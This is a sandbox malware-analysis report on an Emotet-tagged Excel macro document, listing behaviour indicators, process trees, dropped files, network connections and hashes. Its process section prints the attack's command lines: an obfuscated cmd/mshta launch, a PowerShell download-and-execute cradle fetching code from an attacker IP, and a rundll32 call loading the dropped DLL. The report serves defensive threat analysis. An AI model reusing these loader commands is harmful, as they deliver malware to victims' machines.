analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls

Full analysis: https://app.any.run/tasks/e5694e14-2244-433b-8b3f-a5278bdc19a8
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 24, 2022, 18:35:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
loader
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0
MD5:

3F7F1F6050609317474B8F48EFA00E88

SHA1:

C95BFBC3794A4371D3B5A6702052D662DEE19A15

SHA256:

ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70

SSDEEP:

1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2760)
      • EXCEL.EXE (PID: 2160)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2760)
      • EXCEL.EXE (PID: 2160)

    • Executes PowerShell scripts

      • mshta.exe (PID: 2112)
      • mshta.exe (PID: 2756)

    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 3624)
      • rundll32.exe (PID: 2796)
      • rundll32.exe (PID: 4000)
      • rundll32.exe (PID: 3992)
      • rundll32.exe (PID: 3484)

    • Connects to CnC server

      • rundll32.exe (PID: 3484)

  • SUSPICIOUS

    • Checks supported languages

      • cmd.exe (PID: 4004)
      • mshta.exe (PID: 2112)
      • powershell.exe (PID: 3568)
      • mshta.exe (PID: 2756)
      • cmd.exe (PID: 2836)
      • powershell.exe (PID: 472)
      • cmd.exe (PID: 188)
      • cmd.exe (PID: 3972)

    • Reads default file associations for system extensions

      • EXCEL.EXE (PID: 2760)
      • SearchProtocolHost.exe (PID: 3624)
      • EXCEL.EXE (PID: 2160)

    • Reads the computer name

      • mshta.exe (PID: 2112)
      • powershell.exe (PID: 3568)
      • mshta.exe (PID: 2756)
      • powershell.exe (PID: 472)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 4004)
      • cmd.exe (PID: 2836)

    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2112)
      • mshta.exe (PID: 2756)

    • Reads Environment values

      • powershell.exe (PID: 3568)
      • powershell.exe (PID: 472)

    • Drops a file with a compile date too recent

      • powershell.exe (PID: 3568)
      • rundll32.exe (PID: 2796)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3568)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3568)
      • rundll32.exe (PID: 2796)

    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 188)
      • rundll32.exe (PID: 4000)
      • rundll32.exe (PID: 2796)
      • rundll32.exe (PID: 3992)

    • Starts itself from another location

      • rundll32.exe (PID: 4000)

    • Application launched itself

      • rundll32.exe (PID: 2796)
      • rundll32.exe (PID: 3992)

    • Starts Microsoft Office Application

      • EXCEL.EXE (PID: 2160)

  • INFO

    • Checks supported languages

      • EXCEL.EXE (PID: 2760)
      • EXCEL.EXE (PID: 2160)
      • rundll32.exe (PID: 4000)
      • rundll32.exe (PID: 2796)
      • rundll32.exe (PID: 3484)
      • rundll32.exe (PID: 3992)
      • CLVIEW.EXE (PID: 2032)
      • fc.exe (PID: 2264)

    • Reads the computer name

      • EXCEL.EXE (PID: 2760)
      • EXCEL.EXE (PID: 2160)
      • rundll32.exe (PID: 2796)
      • rundll32.exe (PID: 3484)
      • CLVIEW.EXE (PID: 2032)

    • Reads internet explorer settings

      • mshta.exe (PID: 2112)
      • mshta.exe (PID: 2756)
      • CLVIEW.EXE (PID: 2032)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 2760)
      • EXCEL.EXE (PID: 2160)

    • Manual execution by user

      • EXCEL.EXE (PID: 2160)
      • cmd.exe (PID: 3972)

    • Checks Windows Trust Settings

      • powershell.exe (PID: 3568)
      • powershell.exe (PID: 472)
      • rundll32.exe (PID: 3484)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2760)
      • EXCEL.EXE (PID: 2160)
      • CLVIEW.EXE (PID: 2032)

    • Reads Microsoft Outlook installation path

      • CLVIEW.EXE (PID: 2032)

    • Reads settings of System Certificates

      • rundll32.exe (PID: 3484)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
TitleOfParts:
  • Sheet2
  • Sheet1
  • BLC
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:01:20 19:07:37
CreateDate: 2022:01:20 19:00:43
Software: Microsoft Excel
LastModifiedBy: xXx
Author: xXx
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
17
Malicious processes
7
Suspicious processes
4

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe powershell.exe excel.exe no specs cmd.exe no specs mshta.exe searchprotocolhost.exe no specs cmd.exe no specs rundll32.exe no specs rundll32.exe powershell.exe rundll32.exe no specs rundll32.exe clview.exe no specs cmd.exe no specs fc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2760"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
4004cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2112mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3568"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
2160"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2836cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2756mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3624"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\system32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Version:
7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211)
188"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4000C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\SysWow64\rundll32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
12 532
Read events
12 178
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
120
Text files
76
Unknown types
9

Dropped files

PID
Process
Filename
Type
2760EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2FC7.tmp.cvr
MD5:
SHA256:
2160EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR4CF4.tmp.cvr
MD5:
SHA256:
2760EXCEL.EXEC:\Users\admin\Desktop\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xlsdocument
MD5:0C00DD09ABCD52959A10C78BA946966C
SHA256:4D753B780F7F9393E7F9D0B46BE3DE0F2030D0FA788733E1BC028F90BB5A0CD4
2760EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF35594201F23110FA.TMPatn
MD5:CDFB84B601CD88D28A25B871ABD3BEC1
SHA256:DEA75B3664ECD4E1AA6329704610C7712C90633D8BF552F00724A2FF372C4C3E
2760EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:105A209345F69A8DF243BCB9A739ABC2
SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9
2160EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70 - Copy.xls.LNKlnk
MD5:69E5EF0CA4B56427BED2E5958882CFED
SHA256:A643A5426D774BFFB4212B0478998CF81E10D7D6B2DBE1F153AA178C5742AC5A
2760EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNKlnk
MD5:93C3D0747A651BA6D5093BADEB28CDBB
SHA256:5744991AB2D694ED982D74A675618A409F482946DB202A6FA00951286ADF2D4B
2112mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe2[1].htmbinary
MD5:9F303AED27F68A19797E11246A1EDE5B
SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B
3568powershell.exeC:\Users\Public\Documents\ssd.dllexecutable
MD5:5FC018538B34E891E67D7CCD6A6F5169
SHA256:8187FDAB6CF2AE48ADACE0A38973B64D2164AEDDD5EE27ECA0C55F5F8683BFAF
2756mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\fe2[1].htmbinary
MD5:9F303AED27F68A19797E11246A1EDE5B
SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
15
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2112
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
binary
10.8 Kb
malicious
3568
powershell.exe
GET
200
104.21.82.47:80
http://hindimedia.in/wp-content/uploads/iXntuGFqLE31oHsTk/
US
executable
612 Kb
suspicious
2756
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
binary
10.8 Kb
malicious
472
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.png
FR
text
1011 b
malicious
3568
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.png
FR
text
1011 b
malicious
3484
rundll32.exe
GET
200
23.32.238.178:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?42eef2dbfbfa4388
US
compressed
4.70 Kb
whitelisted
3484
rundll32.exe
GET
200
23.32.238.178:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1c5128f6c0972824
US
compressed
59.9 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
104.21.82.47:80
hindimedia.in
Cloudflare Inc
US
suspicious
2112
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
3484
rundll32.exe
131.100.24.231:80
GOPLEX TELECOMUNICACOES E INTERNET LTDA - ME
BR
malicious
172.67.153.105:80
hindimedia.in
US
suspicious
472
powershell.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
3568
powershell.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
472
powershell.exe
104.21.82.47:80
hindimedia.in
Cloudflare Inc
US
suspicious
3484
rundll32.exe
23.32.238.178:80
ctldl.windowsupdate.com
XO Communications
US
suspicious
3484
rundll32.exe
209.59.138.75:7080
Liquid Web, L.L.C
US
malicious
2756
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious

DNS requests

Domain
IP
Reputation
hindimedia.in
  • 104.21.82.47
  • 172.67.153.105
suspicious
ctldl.windowsupdate.com
  • 23.32.238.178
  • 23.32.238.226
  • 23.32.238.232
whitelisted

Threats

PID
Process
Class
Message
3568
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3568
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3568
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3484
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 5
3484
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 14
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls